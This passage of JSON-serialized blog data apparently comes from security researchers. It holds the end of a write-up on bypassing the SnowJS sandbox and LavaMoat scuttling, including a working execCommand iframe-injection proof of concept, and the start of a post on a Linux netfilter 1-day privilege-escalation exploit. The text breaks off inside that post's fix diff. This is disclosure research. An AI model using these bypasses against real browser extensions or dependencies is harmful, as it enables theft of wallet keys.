children":53765},{"style":6947},[53766],{"type":31,"value":53767},"    Node:",{"type":25,"tag":216,"props":53769,"children":53770},{"style":6964},[53771],{"type":31,"value":26978},{"type":25,"tag":216,"props":53773,"children":53774},{"style":8205},[53775],{"type":31,"value":53776},"'appendChild'",{"type":25,"tag":216,"props":53778,"children":53779},{"style":6964},[53780],{"type":31,"value":7026},{"type":25,"tag":216,"props":53782,"children":53783},{"style":8205},[53784],{"type":31,"value":53785},"'insertBefore'",{"type":25,"tag":216,"props":53787,"children":53788},{"style":6964},[53789],{"type":31,"value":7026},{"type":25,"tag":216,"props":53791,"children":53792},{"style":8205},[53793],{"type":31,"value":53794},"'replaceChild'",{"type":25,"tag":216,"props":53796,"children":53797},{"style":6964},[53798],{"type":31,"value":18220},{"type":25,"tag":216,"props":53800,"children":53801},{"class":6922,"line":7216},[53802,53807,53811,53816,53820,53825,53829,53834,53838,53843,53847,53852,53856,53860,53864,53869,53873,53877,53881,53886,53890,53894],{"type":25,"tag":216,"props":53803,"children":53804},{"style":6947},[53805],{"type":31,"value":53806},"    Element:",{"type":25,"tag":216,"props":53808,"children":53809},{"style":6964},[53810],{"type":31,"value":26978},{"type":25,"tag":216,"props":53812,"children":53813},{"style":8205},[53814],{"type":31,"value":53815},"'innerHTML'",{"type":25,"tag":216,"props":53817,"children":53818},{"style":6964},[53819],{"type":31,"value":7026},{"type":25,"tag":216,"props":53821,"children":53822},{"style":8205},[53823],{"type":31,"value":53824},"'outerHTML'",{"type":25,"tag":216,"props":53826,"children":53827},{"style":6964},[53828],{"type":31,"value":7026},{"type":25,"tag":216,"props":53830,"children":53831},{"style":8205},[53832],{"type":31,"value":53833},"'insertAdjacentHTML'",{"type":25,"tag":216,"props":53835,"children":53836},{"style":6964},[53837],{"type":31,"value":7026},{"type":25,"tag":216,"props":53839,"children":53840},{"style":8205},[53841],{"type":31,"value":53842},"'replaceWith'",{"type":25,"tag":216,"props":53844,"children":53845},{"style":6964},[53846],{"type":31,"value":7026},{"type":25,"tag":216,"props":53848,"children":53849},{"style":8205},[53850],{"type":31,"value":53851},"'insertAdjacentElement'",{"type":25,"tag":216,"props":53853,"children":53854},{"style":6964},[53855],{"type":31,"value":7026},{"type":25,"tag":216,"props":53857,"children":53858},{"style":8205},[53859],{"type":31,"value":53692},{"type":25,"tag":216,"props":53861,"children":53862},{"style":6964},[53863],{"type":31,"value":7026},{"type":25,"tag":216,"props":53865,"children":53866},{"style":8205},[53867],{"type":31,"value":53868},"'before'",{"type":25,"tag":216,"props":53870,"children":53871},{"style":6964},[53872],{"type":31,"value":7026},{"type":25,"tag":216,"props":53874,"children":53875},{"style":8205},[53876],{"type":31,"value":53701},{"type":25,"tag":216,"props":53878,"children":53879},{"style":6964},[53880],{"type":31,"value":7026},{"type":25,"tag":216,"props":53882,"children":53883},{"style":8205},[53884],{"type":31,"value":53885},"'after'",{"type":25,"tag":216,"props":53887,"children":53888},{"style":6964},[53889],{"type":31,"value":7026},{"type":25,"tag":216,"props":53891,"children":53892},{"style":8205},[53893],{"type":31,"value":53683},{"type":25,"tag":216,"props":53895,"children":53896},{"style":6964},[53897],{"type":31,"value":18220},{"type":25,"tag":216,"props":53899,"children":53900},{"class":6922,"line":7244},[53901,53906,53910,53914],{"type":25,"tag":216,"props":53902,"children":53903},{"style":6947},[53904],{"type":31,"value":53905},"    ShadowRoot:",{"type":25,"tag":216,"props":53907,"children":53908},{"style":6964},[53909],{"type":31,"value":26978},{"type":25,"tag":216,"props":53911,"children":53912},{"style":8205},[53913],{"type":31,"value":53815},{"type":25,"tag":216,"props":53915,"children":53916},{"style":6964},[53917],{"type":31,"value":18220},{"type":25,"tag":216,"props":53919,"children":53920},{"class":6922,"line":7257},[53921,53926,53930,53935],{"type":25,"tag":216,"props":53922,"children":53923},{"style":6947},[53924],{"type":31,"value":53925},"    HTMLIFrameElement:",{"type":25,"tag":216,"props":53927,"children":53928},{"style":6964},[53929],{"type":31,"value":26978},{"type":25,"tag":216,"props":53931,"children":53932},{"style":8205},[53933],{"type":31,"value":53934},"'srcdoc'",{"type":25,"tag":216,"props":53936,"children":53937},{"style":6964},[53938],{"type":31,"value":18220},{"type":25,"tag":216,"props":53940,"children":53941},{"class":6922,"line":7275},[53942],{"type":25,"tag":216,"props":53943,"children":53944},{"style":6964},[53945],{"type":31,"value":20536},{"type":25,"tag":38,"props":53947,"children":53948},{},[53949],{"type":31,"value":53950},"This means that an attacker can't use any of these functions to create an iframe and bypass the snowJS sandbox, because it will detect the new frame and include it in the sandbox.",{"type":25,"tag":38,"props":53952,"children":53953},{},[53954],{"type":31,"value":53955},"Unfortunately, client-side javascript is surprisingly complex with lots of strange behaviours that could be used to bypass the hook security feature.",{"type":25,"tag":606,"props":53957,"children":53959},{"id":53958},"bypassing-snowjs",[53960],{"type":31,"value":53961},"Bypassing SnowJS",{"type":25,"tag":38,"props":53963,"children":53964},{},[53965,53967,53978,53980,53986],{"type":31,"value":53966},"The deprecated ",{"type":25,"tag":162,"props":53968,"children":53971},{"href":53969,"rel":53970},"https://developer.mozilla.org/en-US/docs/Web/API/Document/execCommand",[166],[53972],{"type":25,"tag":82,"props":53973,"children":53975},{"className":53974},[],[53976],{"type":31,"value":53977},"document.execCommand",{"type":31,"value":53979}," function is used to execute commands inside a ",{"type":25,"tag":82,"props":53981,"children":53983},{"className":53982},[],[53984],{"type":31,"value":53985},"contenteditable",{"type":31,"value":53987}," focused context. Despite this being a deprecated function, it is still supported by modern browsers.",{"type":25,"tag":206,"props":53989,"children":53992},{"className":53990,"code":53991,"language":36345,"meta":7,"style":7},"language-html shiki shiki-themes slack-dark","\u003Cdiv id=test contenteditable autofocus>\u003C/div>\n",[53993],{"type":25,"tag":82,"props":53994,"children":53995},{"__ignoreMap":7},[53996],{"type":25,"tag":216,"props":53997,"children":53998},{"class":6922,"line":6923},[53999,54003,54007,54011,54015,54020,54025,54030,54035,54039],{"type":25,"tag":216,"props":54000,"children":54001},{"style":36338},[54002],{"type":31,"value":9757},{"type":25,"tag":216,"props":54004,"children":54005},{"style":6936},[54006],{"type":31,"value":35308},{"type":25,"tag":216,"props":54008,"children":54009},{"style":6947},[54010],{"type":31,"value":36418},{"type":25,"tag":216,"props":54012,"children":54013},{"style":6964},[54014],{"type":31,"value":266},{"type":25,"tag":216,"props":54016,"children":54017},{"style":8205},[54018],{"type":31,"value":54019},"test",{"type":25,"tag":216,"props":54021,"children":54022},{"style":6947},[54023],{"type":31,"value":54024}," contenteditable",{"type":25,"tag":216,"props":54026,"children":54027},{"style":6947},[54028],{"type":31,"value":54029}," autofocus",{"type":25,"tag":216,"props":54031,"children":54032},{"style":36338},[54033],{"type":31,"value":54034},">\u003C/",{"type":25,"tag":216,"props":54036,"children":54037},{"style":6936},[54038],{"type":31,"value":35308},{"type":25,"tag":216,"props":54040,"children":54041},{"style":36338},[54042],{"type":31,"value":9943},{"type":25,"tag":38,"props":54044,"children":54045},{},[54046,54048,54054,54056,54061],{"type":31,"value":54047},"After inserting this element to a page, it is possible to use ",{"type":25,"tag":82,"props":54049,"children":54051},{"className":54050},[],[54052],{"type":31,"value":54053},"insertHTML",{"type":31,"value":54055}," command of ",{"type":25,"tag":82,"props":54057,"children":54059},{"className":54058},[],[54060],{"type":31,"value":53977},{"type":31,"value":54062}," to add a non-sandboxed iframe.",{"type":25,"tag":206,"props":54064,"children":54066},{"className":35325,"code":54065,"language":35327,"meta":7,"style":7},"document.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\n",[54067],{"type":25,"tag":82,"props":54068,"children":54069},{"__ignoreMap":7},[54070],{"type":25,"tag":216,"props":54071,"children":54072},{"class":6922,"line":6923},[54073,54077,54081,54086,54090,54095,54099,54103,54107,54112],{"type":25,"tag":216,"props":54074,"children":54075},{"style":6947},[54076],{"type":31,"value":36670},{"type":25,"tag":216,"props":54078,"children":54079},{"style":6964},[54080],{"type":31,"value":179},{"type":25,"tag":216,"props":54082,"children":54083},{"style":7047},[54084],{"type":31,"value":54085},"execCommand",{"type":25,"tag":216,"props":54087,"children":54088},{"style":6964},[54089],{"type":31,"value":1850},{"type":25,"tag":216,"props":54091,"children":54092},{"style":8205},[54093],{"type":31,"value":54094},"'insertHTML'",{"type":25,"tag":216,"props":54096,"children":54097},{"style":6964},[54098],{"type":31,"value":7026},{"type":25,"tag":216,"props":54100,"children":54101},{"style":6936},[54102],{"type":31,"value":12127},{"type":25,"tag":216,"props":54104,"children":54105},{"style":6964},[54106],{"type":31,"value":7026},{"type":25,"tag":216,"props":54108,"children":54109},{"style":8205},[54110],{"type":31,"value":54111},"'\u003Ciframe srcdoc=\"aaa\">'",{"type":25,"tag":216,"props":54113,"children":54114},{"style":6964},[54115],{"type":31,"value":7797},{"type":25,"tag":606,"props":54117,"children":54119},{"id":54118},"impact-on-lavamoat-scuttling",[54120],{"type":31,"value":54121},"Impact On Lavamoat Scuttling",{"type":25,"tag":38,"props":54123,"children":54124},{},[54125],{"type":31,"value":54126},"As it is recommended to use snowJS integrated with Lavamoat scuttling to prevent bypasses, it is possible to completely bypass the scuttling feature without pre-conditions.",{"type":25,"tag":38,"props":54128,"children":54129},{},[54130,54132,54137,54139,54144],{"type":31,"value":54131},"For the exploit, the only used functions are in ",{"type":25,"tag":82,"props":54133,"children":54135},{"className":54134},[],[54136],{"type":31,"value":36670},{"type":31,"value":54138}," object, which can never be scuttled once it is a non-writable and non-configurable property in ",{"type":25,"tag":82,"props":54140,"children":54142},{"className":54141},[],[54143],{"type":31,"value":41380},{"type":31,"value":54145}," object.",{"type":25,"tag":38,"props":54147,"children":54148},{},[54149,54151,54156],{"type":31,"value":54150},"Consider this example, which runs a scuttled ",{"type":25,"tag":82,"props":54152,"children":54154},{"className":54153},[],[54155],{"type":31,"value":36660},{"type":31,"value":29426},{"type":25,"tag":206,"props":54158,"children":54160},{"className":35325,"code":54159,"language":35327,"meta":7,"style":7},"document.body.innerHTML = \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\";\ndocument.getElementById('test').focus();\ndocument.execCommand('insertHTML', false, '\u003Ciframe srcdoc=\"aaa\">');\ndocument.getElementsByTagName('iframe')[0].contentWindow.alert(document.domain);\n",[54161],{"type":25,"tag":82,"props":54162,"children":54163},{"__ignoreMap":7},[54164,54200,54237,54280],{"type":25,"tag":216,"props":54165,"children":54166},{"class":6922,"line":6923},[54167,54171,54175,54179,54183,54187,54191,54196],{"type":25,"tag":216,"props":54168,"children":54169},{"style":6947},[54170],{"type":31,"value":36670},{"type":25,"tag":216,"props":54172,"children":54173},{"style":6964},[54174],{"type":31,"value":179},{"type":25,"tag":216,"props":54176,"children":54177},{"style":6947},[54178],{"type":31,"value":36362},{"type":25,"tag":216,"props":54180,"children":54181},{"style":6964},[54182],{"type":31,"value":179},{"type":25,"tag":216,"props":54184,"children":54185},{"style":6947},[54186],{"type":31,"value":38935},{"type":25,"tag":216,"props":54188,"children":54189},{"style":6953},[54190],{"type":31,"value":6956},{"type":25,"tag":216,"props":54192,"children":54193},{"style":8205},[54194],{"type":31,"value":54195}," \"\u003Cdiv id=test contenteditable autofocus>\u003C/div>\"",{"type":25,"tag":216,"props":54197,"children":54198},{"style":6964},[54199],{"type":31,"value":6967},{"type":25,"tag":216,"props":54201,"children":54202},{"class":6922,"line":6769},[54203,54207,54211,54215,54219,54224,54228,54233],{"type":25,"tag":216,"props":54204,"children":54205},{"style":6947},[54206],{"type":31,"value":36670},{"type":25,"tag":216,"props":54208,"children":54209},{"style":6964},[54210],{"type":31,"value":179},{"type":25,"tag":216,"props":54212,"children":54213},{"style":7047},[54214],{"type":31,"value":38960},{"type":25,"tag":216,"props":54216,"children":54217},{"style":6964},[54218],{"type":31,"value":1850},{"type":25,"tag":216,"props":54220,"children":54221},{"style":8205},[54222],{"type":31,"value":54223},"'test'",{"type":25,"tag":216,"props":54225,"children":54226},{"style":6964},[54227],{"type":31,"value":24702},{"type":25,"tag":216,"props":54229,"children":54230},{"style":7047},[54231],{"type":31,"value":54232},"focus",{"type":25,"tag":216,"props":54234,"children":54235},{"style":6964},[54236],{"type":31,"value":7633},{"type":25,"tag":216,"props":54238,"children":54239},{"class":6922,"line":6778},[54240,54244,54248,54252,54256,54260,54264,54268,54272,54276],{"type":25,"tag":216,"props":54241,"children":54242},{"style":6947},[54243],{"type":31,"value":36670},{"type":25,"tag":216,"props":54245,"children":54246},{"style":6964},[54247],{"type":31,"value":179},{"type":25,"tag":216,"props":54249,"children":54250},{"style":7047},[54251],{"type":31,"value":54085},{"type":25,"tag":216,"props":54253,"children":54254},{"style":6964},[54255],{"type":31,"value":1850},{"type":25,"tag":216,"props":54257,"children":54258},{"style":8205},[54259],{"type":31,"value":54094},{"type":25,"tag":216,"props":54261,"children":54262},{"style":6964},[54263],{"type":31,"value":7026},{"type":25,"tag":216,"props":54265,"children":54266},{"style":6936},[54267],{"type":31,"value":12127},{"type":25,"tag":216,"props":54269,"children":54270},{"style":6964},[54271],{"type":31,"value":7026},{"type":25,"tag":216,"props":54273,"children":54274},{"style":8205},[54275],{"type":31,"value":54111},{"type":25,"tag":216,"props":54277,"children":54278},{"style":6964},[54279],{"type":31,"value":7797},{"type":25,"tag":216,"props":54281,"children":54282},{"class":6922,"line":7005},[54283,54287,54291,54296,54300,54304,54309,54313,54318,54323,54327,54331,54335,54339,54343,54347],{"type":25,"tag":216,"props":54284,"children":54285},{"style":6947},[54286],{"type":31,"value":36670},{"type":25,"tag":216,"props":54288,"children":54289},{"style":6964},[54290],{"type":31,"value":179},{"type":25,"tag":216,"props":54292,"children":54293},{"style":7047},[54294],{"type":31,"value":54295},"getElementsByTagName",{"type":25,"tag":216,"props":54297,"children":54298},{"style":6964},[54299],{"type":31,"value":1850},{"type":25,"tag":216,"props":54301,"children":54302},{"style":8205},[54303],{"type":31,"value":40693},{"type":25,"tag":216,"props":54305,"children":54306},{"style":6964},[54307],{"type":31,"value":54308},")[",{"type":25,"tag":216,"props":54310,"children":54311},{"style":6989},[54312],{"type":31,"value":1882},{"type":25,"tag":216,"props":54314,"children":54315},{"style":6964},[54316],{"type":31,"value":54317},"].",{"type":25,"tag":216,"props":54319,"children":54320},{"style":6947},[54321],{"type":31,"value":54322},"contentWindow",{"type":25,"tag":216,"props":54324,"children":54325},{"style":6964},[54326],{"type":31,"value":179},{"type":25,"tag":216,"props":54328,"children":54329},{"style":7047},[54330],{"type":31,"value":36660},{"type":25,"tag":216,"props":54332,"children":54333},{"style":6964},[54334],{"type":31,"value":1850},{"type":25,"tag":216,"props":54336,"children":54337},{"style":6947},[54338],{"type":31,"value":36670},{"type":25,"tag":216,"props":54340,"children":54341},{"style":6964},[54342],{"type":31,"value":179},{"type":25,"tag":216,"props":54344,"children":54345},{"style":6947},[54346],{"type":31,"value":36680},{"type":25,"tag":216,"props":54348,"children":54349},{"style":6964},[54350],{"type":31,"value":7797},{"type":25,"tag":606,"props":54352,"children":54354},{"id":54353},"snowjs-patch",[54355],{"type":31,"value":54356},"SnowJS Patch",{"type":25,"tag":38,"props":54358,"children":54359},{},[54360,54362,54369,54371,54378],{"type":31,"value":54361},"Metamask is working on conceptual changes and aiming to integrate SnowJS as a ",{"type":25,"tag":162,"props":54363,"children":54366},{"href":54364,"rel":54365},"https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html#talk",[166],[54367],{"type":31,"value":54368},"browser feature within W3C standards",{"type":31,"value":54370},", with the intention of addressing not only this issue, but also all other well-known issues with SnowJS. ",{"type":25,"tag":162,"props":54372,"children":54375},{"href":54373,"rel":54374},"https://github.com/weizman/Realms-Initialization-Control",[166],[54376],{"type":31,"value":54377},"Here",{"type":31,"value":54379}," is their new proposal.",{"type":25,"tag":26,"props":54381,"children":54383},{"id":54382},"chaining-the-impacts",[54384],{"type":31,"value":54385},"Chaining The Impacts",{"type":25,"tag":38,"props":54387,"children":54388},{},[54389],{"type":31,"value":54390},"We were able to find two vulnerabilities in lavamoat project:",{"type":25,"tag":6711,"props":54392,"children":54393},{},[54394,54399],{"type":25,"tag":2043,"props":54395,"children":54396},{},[54397],{"type":31,"value":54398},"Policy File Bypass",{"type":25,"tag":2043,"props":54400,"children":54401},{},[54402],{"type":31,"value":54403},"Scuttling Bypass",{"type":25,"tag":38,"props":54405,"children":54406},{},[54407],{"type":31,"value":54408},"By combining the exploits, it is possible to completely bypass lavamoat supply-chain protections using a compromised dependency.",{"type":25,"tag":38,"props":54410,"children":54411},{},[54412],{"type":31,"value":54413},"Using Metamask as an example, these exploits could be used to retrieve the encrypted keypair in extension storage. The only precondition would be compromising a NPM dependency.",{"type":25,"tag":26,"props":54415,"children":54416},{"id":32892},[54417],{"type":31,"value":22907},{"type":25,"tag":38,"props":54419,"children":54420},{},[54421],{"type":31,"value":54422},"The vulnerability within the Lavapack module sandboxing, along with the issues we discussed regarding SnowJs and the Scuttling feature, illustrate the complexities of mitigating supply chain attacks within the JavaScript ecosystem. While the lavapack release with a mitigation was available in under two days, the inherent complexity makes designing robust security implementations a challenging task.",{"type":25,"tag":35308,"props":54424,"children":54425},{"style":35310},[54426],{"type":25,"tag":6467,"props":54427,"children":54430},{"src":54428,"alt":54429,"style":35316},"/posts/supply-chain-attacks-a-new-era/hello-otter.gif","Hello Otetr",[],{"type":25,"tag":22381,"props":54432,"children":54434},{"className":54433,"dataFootnotes":7},[22384],[54435,54440],{"type":25,"tag":26,"props":54436,"children":54438},{"className":54437,"id":19438},[22389],[54439],{"type":31,"value":22392},{"type":25,"tag":6711,"props":54441,"children":54442},{},[54443],{"type":25,"tag":2043,"props":54444,"children":54445},{"id":34327},[54446,54448,54455,54456],{"type":31,"value":54447},"Excluding SES, which was covered ",{"type":25,"tag":162,"props":54449,"children":54452},{"href":54450,"rel":54451},"https://osec.io/blog/2023-11-01-metamask-snaps",[166],[54453],{"type":31,"value":54454},"in our last article",{"type":31,"value":10409},{"type":25,"tag":162,"props":54457,"children":54459},{"href":34355,"ariaLabel":22495,"className":54458,"dataFootnoteBackref":7},[22497],[54460],{"type":31,"value":22500},{"type":25,"tag":9316,"props":54462,"children":54463},{},[54464],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":54466},[54467,54471,54477,54483,54484,54485],{"id":22916,"depth":6769,"text":22919,"children":54468},[54469,54470],{"id":32975,"depth":6778,"text":32978},{"id":51089,"depth":6778,"text":51092},{"id":51845,"depth":6769,"text":51848,"children":54472},[54473,54474,54475,54476],{"id":52096,"depth":6778,"text":52099},{"id":52571,"depth":6778,"text":52574},{"id":53228,"depth":6778,"text":53231},{"id":53351,"depth":6778,"text":53354},{"id":53469,"depth":6769,"text":53472,"children":54478},[54479,54480,54481,54482],{"id":53596,"depth":6778,"text":53599},{"id":53958,"depth":6778,"text":53961},{"id":54118,"depth":6778,"text":54121},{"id":54353,"depth":6778,"text":54356},{"id":54382,"depth":6769,"text":54385},{"id":32892,"depth":6769,"text":22907},{"id":19438,"depth":6769,"text":22392},"content:blog:2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era.md","blog/2024-06-10-supply-chain-attacks-a-new-era",{"_path":54490,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":54491,"description":54492,"author":54493,"image":54494,"date":54496,"isFeatured":16,"tags":54497,"onBlogPage":16,"body":54500,"_type":6798,"_id":64878,"_source":6800,"_file":64879,"_stem":64880,"_extension":6803},"/blog/2024-11-25-netfilter-universal-root-1-day","OtterRoot: Netfilter Universal Root 1-day","A peek into the state of Linux kernel security and the open-source patch-gap. We explore how we monitored commits to find new bug fixes and achieved 0day-like capabilities by exploiting a 1-day vulnerability.","pedro",{"src":54495,"height":13221,"width":9674},"/posts/netfilter-universal-root-1-day/cover.png","2024-11-25",[54498,54499],"kernal","linux",{"type":22,"children":54501,"toc":64846},[54502,54515,54529,54534,54540,54550,54555,54561,54566,54584,54598,54607,54640,54645,54651,54670,54703,54709,54722,54932,54999,55562,55581,55806,55865,55871,55891,55931,56119,56124,56275,56331,56336,56850,56869,57138,57164,57673,57740,57746,57782,57787,58053,58086,58098,58125,58137,58142,58148,58169,58175,58196,58219,59051,59057,59097,59637,59648,59682,59749,59803,60035,60041,60085,60548,60554,60565,60595,60678,60683,60688,60724,60776,60807,61362,61368,61385,61391,61396,61402,61430,61623,61643,61659,62254,62260,62294,62317,62329,62335,62363,62960,62985,63954,63965,63978,63991,64757,64771,64777,64789,64795,64823,64828,64832,64837,64842],{"type":25,"tag":38,"props":54503,"children":54504},{},[54505,54507,54514],{"type":31,"value":54506},"In late March, I attempted to monitor commits in Linux kernel subsystems that are hotspots for exploitable bugs, partially as an experiment to study how feasible it is to maintain LPE/container escape capabilities by patch-gapping/cycling 1-days, but also to submit to the ",{"type":25,"tag":162,"props":54508,"children":54511},{"href":54509,"rel":54510},"https://google.github.io/security-research/kernelctf/rules.html",[166],[54512],{"type":31,"value":54513},"KernelCTF VRP",{"type":31,"value":179},{"type":25,"tag":38,"props":54516,"children":54517},{},[54518,54520,54527],{"type":31,"value":54519},"During the research, I quickly came across an exploitable bug fixed in netfilter, which was labeled CVE-2024-26809 (originally discovered by ",{"type":25,"tag":162,"props":54521,"children":54524},{"href":54522,"rel":54523},"https://github.com/conlonialC",[166],[54525],{"type":31,"value":54526},"lonial con",{"type":31,"value":54528},") and was able to exploit it in the KernelCTF LTS instance and write a universal exploit that runs across different kernel builds without the need to recompile with different symbols or ROP gadgets.",{"type":25,"tag":38,"props":54530,"children":54531},{},[54532],{"type":31,"value":54533},"In this post, I'll discuss how I exploited a 1day to obtain 0day-like LPE/container escape capabilities for around two months by quickly abusing the patch-gap to write an exploit before the fix could go downstream. I'll also share my journey analyzing the patch to understand the bug, isolate the commit(s) that introduced it, exploit it in the KernelCTF VRP, and, finally, how I developed a universal exploit to target mainstream distros.",{"type":25,"tag":26,"props":54535,"children":54537},{"id":54536},"the-kernel",[54538],{"type":31,"value":54539},"The kernel",{"type":25,"tag":38,"props":54541,"children":54542},{},[54543,54545],{"type":31,"value":54544},"The kernel lies at the very core of an OS; its purpose is not to be a regular application but to create a platform that applications can run on top of. The kernel touches hardware directly to implement everything you can expect from your OS, such as user isolation and permissions, networking, filesystem access, memory management, task scheduling, etc.\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀",{"type":25,"tag":6467,"props":54546,"children":54549},{"alt":54547,"src":54548},"image","/posts/netfilter-universal-root-1-day/kernal.png",[],{"type":25,"tag":38,"props":54551,"children":54552},{},[54553],{"type":31,"value":54554},"The kernel exposes an interface that user applications can use to request things they can't do directly (e.g. map some memory to my process' virtual address space, expose some file to my process, open a network socket, etc.). This is called the syscall interface, the main form of passing data from userspace to kernelspace.",{"type":25,"tag":606,"props":54556,"children":54558},{"id":54557},"kernel-exploitation",[54559],{"type":31,"value":54560},"Kernel exploitation",{"type":25,"tag":38,"props":54562,"children":54563},{},[54564],{"type":31,"value":54565},"As the kernel processes requests passed by user applications, it is subject to bugs and security vulnerabilities just as any code would, ranging from logic issues to memory corruptions that attackers can use to hijack the execution in kernel context or escalate privileges in some other way. With that in mind, we can expect the typical kernel exploit to look like this:",{"type":25,"tag":2039,"props":54567,"children":54568},{},[54569,54574,54579],{"type":25,"tag":2043,"props":54570,"children":54571},{},[54572],{"type":31,"value":54573},"Trigger some memory corruption in some kernel subsystem",{"type":25,"tag":2043,"props":54575,"children":54576},{},[54577],{"type":31,"value":54578},"Use it to acquire some stronger primitive (Control-flow, Arb R/W, etc.)",{"type":25,"tag":2043,"props":54580,"children":54581},{},[54582],{"type":31,"value":54583},"Use your current primitive to escalate your privileges (usually by changing the creds of your process or something with similar consequences)",{"type":25,"tag":38,"props":54585,"children":54586},{},[54587,54589,54596],{"type":31,"value":54588},"I strongly recommend reading Lkmidas' Intro to Kernel Exploitation ",{"type":25,"tag":162,"props":54590,"children":54593},{"href":54591,"rel":54592},"https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/",[166],[54594],{"type":31,"value":54595},"blog post",{"type":31,"value":54597}," to become more familiar with the topic.",{"type":25,"tag":26,"props":54599,"children":54601},{"id":54600},"nf_tables",[54602],{"type":25,"tag":82,"props":54603,"children":54605},{"className":54604},[],[54606],{"type":31,"value":54600},{"type":25,"tag":38,"props":54608,"children":54609},{},[54610,54615,54617,54623,54624,54630,54632,54638],{"type":25,"tag":82,"props":54611,"children":54613},{"className":54612},[],[54614],{"type":31,"value":54600},{"type":31,"value":54616}," is a component of the netfilter subsystem of the Linux kernel. It is a package filtering mechanism, and it's the current backend used by tools like iptables and Firewalld. Its internals have been thoroughly discussed by other researchers ",{"type":25,"tag":162,"props":54618,"children":54621},{"href":54619,"rel":54620},"https://pwning.tech/nftables",[166],[54622],{"type":31,"value":184},{"type":31,"value":7026},{"type":25,"tag":162,"props":54625,"children":54628},{"href":54626,"rel":54627},"https://starlabs.sg/blog/2023/09-nftables-adventures-bug-hunting-and-n-day-exploitation",[166],[54629],{"type":31,"value":331},{"type":31,"value":54631},". I recommend reading those briefly to understand the hierarchical structure of ",{"type":25,"tag":82,"props":54633,"children":54635},{"className":54634},[],[54636],{"type":31,"value":54637},"nf_table",{"type":31,"value":54639}," objects and how we can manipulate them to create configurable filtering mechanisms.",{"type":25,"tag":38,"props":54641,"children":54642},{},[54643],{"type":31,"value":54644},"For the sake of this blog post I'll omit any details that are not directly related to the vulnerability.",{"type":25,"tag":606,"props":54646,"children":54648},{"id":54647},"transactions",[54649],{"type":31,"value":54650},"Transactions",{"type":25,"tag":38,"props":54652,"children":54653},{},[54654,54656,54661,54663,54668],{"type":31,"value":54655},"A transaction is an interaction that updates ",{"type":25,"tag":82,"props":54657,"children":54659},{"className":54658},[],[54660],{"type":31,"value":54600},{"type":31,"value":54662}," objects/state. It's roughly composed of a batch of operations that modify some ",{"type":25,"tag":82,"props":54664,"children":54666},{"className":54665},[],[54667],{"type":31,"value":54600},{"type":31,"value":54669}," object (adding/removing/editing tables, sets, elements, objects, etc). They are roughly composed of 3 different passes:",{"type":25,"tag":2039,"props":54671,"children":54672},{},[54673,54683,54693],{"type":25,"tag":2043,"props":54674,"children":54675},{},[54676,54681],{"type":25,"tag":9273,"props":54677,"children":54678},{},[54679],{"type":31,"value":54680},"Control plane",{"type":31,"value":54682},"\nPrepare each operation, and if some fail, abort the whole batch; otherwise, commit the entire batch.",{"type":25,"tag":2043,"props":54684,"children":54685},{},[54686,54691],{"type":25,"tag":9273,"props":54687,"children":54688},{},[54689],{"type":31,"value":54690},"Commit path",{"type":31,"value":54692},"\nAfter the control plane, if all succeed, we apply the changes (effectively modify tables, sets, etc.).",{"type":25,"tag":2043,"props":54694,"children":54695},{},[54696,54701],{"type":25,"tag":9273,"props":54697,"children":54698},{},[54699],{"type":31,"value":54700},"Abort path",{"type":31,"value":54702},"\nOnly triggered when some error condition is detected in the control plane; undo actions done during the control plane and skip commitment.",{"type":25,"tag":26,"props":54704,"children":54706},{"id":54705},"vulnerability-details",[54707],{"type":31,"value":54708},"Vulnerability details",{"type":25,"tag":38,"props":54710,"children":54711},{},[54712,54714,54720],{"type":31,"value":54713},"Moving on, let's check out the ",{"type":25,"tag":162,"props":54715,"children":54718},{"href":54716,"rel":54717},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",[166],[54719],{"type":31,"value":8173},{"type":31,"value":54721}," that fixed the bug.",{"type":25,"tag":206,"props":54723,"children":54725},{"className":44324,"code":54724,"language":44326,"meta":7,"style":7},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\nindex c0ceea068936a6..df8de509024637 100644\n--- a/net/netfilter/nft_set_pipapo.c\n+++ b/net/netfilter/nft_set_pipapo.c\n@@ -2329,8 +2329,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n\n        m = rcu_dereference_protected(priv->match, true);\n\n  if (m) {\n   rcu_barrier();\n \n-  nft_set_pipapo_match_destroy(ctx, set, m);\n-\n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(m, cpu);\n   free_percpu(m->scratch);\n@@ -2342,8 +2340,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,\n  if (priv->clone) {\n   m = priv->clone;\n \n-  if (priv->dirty)\n-   nft_set_pipapo_match_destroy(ctx, set, m);\n+  nft_set_pipapo_match_destroy(ctx, set, m);\n \n   for_each_possible_cpu(cpu)\n    pipapo_free_scratch(priv->clone, cpu);\n",[54726],{"type":25,"tag":82,"props":54727,"children":54728},{"__ignoreMap":7},[54729,54737,54745,54753,54761,54769,54776,54784,54791,54799,54807,54815,54823,54831,54839,54847,54855,54863,54871,54879,54886,54894,54902,54910,54917,54924],{"type":25,"tag":216,"props":54730,"children":54731},{"class":6922,"line":6923},[54732],{"type":25,"tag":216,"props":54733,"children":54734},{"style":6936},[54735],{"type":31,"value":54736},"diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c\n",{"type":25,"tag":216,"props":54738,"children":54739},{"class":6922,"line":6769},[54740],{"type":25,"tag":216,"props":54741,"children":54742},{"style":6964},[54743],{"type":31,"value":54744},"index c0ceea068936a6..df8de509024637 100644\n",{"type":25,"tag":216,"props":54746,"children":54747},{"class":6922,"line":6778},[54748],{"type":25,"tag":216,"props":54749,"children":54750},{"style":6936},[54751],{"type":31,"value":54752},"--- a/net/netfilter/nft_set_pipapo.c\n",{"type":25,"tag":216,"props":54754,"children":54755},{"class":6922,"line":7005},[54756],{"type":25,"tag":216,"props":54757,"children":54758},{"style":6936},[54759],{"type":31,"value":54760},"+++ 